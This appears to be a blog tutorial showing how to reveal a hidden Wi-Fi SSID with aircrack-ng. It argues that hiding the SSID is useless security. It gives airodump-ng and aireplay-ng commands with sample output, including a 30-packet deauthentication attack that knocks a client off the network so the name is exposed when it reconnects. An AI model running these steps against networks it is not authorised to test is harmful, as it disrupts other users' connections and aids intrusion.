Known as security through obscurity, many people may hide there ssid’s from broadcasting. Just like mac address blocking this is a worthless form of protection. There is nothing secure about hiding your SSID. Its like the wizard hiding behind the curtain. It does not add any value to your security, compounding complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first. Start airdump-ng by using the following command. Replace the interface with your own.
airodump-ng wlan1
The readout should be something like this.
CH 9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:91 -29 19 1 0 6 54e WPA2 CCMP PSK linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK <length: 6>
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 – 1 0 1
As you can see from the devices found we have one with a hidden SSID. This hidden SSID is depicted as <length: x> with x being the number of letters in the SSID. Some do not display this number. Honestly the length does not much matter to us. What we are interested in is the clients attached to that access point. You see all we have to do is de-authenticate a client and when that client re-authenticates it will send the SSID though the air allowing us to retrieve it. Lets run airodump-ng again and filter out everything but the access point in question with this command.
airodump-ng -c 6 –bssid 28:EF:01:35:34:85 wlan1
explanation of the switches are
-c = channel of target access point
–bssid = MAC address from the target access point
This is what the airdump-ng readout should look like now.
CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK <length: 6>
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 – 1 0 1
Here we can see the target access point with one client attached (BSSID). We now need to de-authenticate this client and see if we can get the SSID during the re authentication.
Now open a new terminal window and leave airodump-ng running.
Run this command in the new terminal.
aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1
This switches to this command are as follows
-0 = Attack mode 30 = number of deauth packets
-a = Target access point mac address
-c = Target client mac address
Now switch back to the original terminal window that still has airodump-ng running.
This is what it should now look like.
CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK hacked
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 – 1 0 1 hacked
As you can see we now know that the SSID for the target router is “hacked”
If it does not work the first time try aireplay-ng again until it works.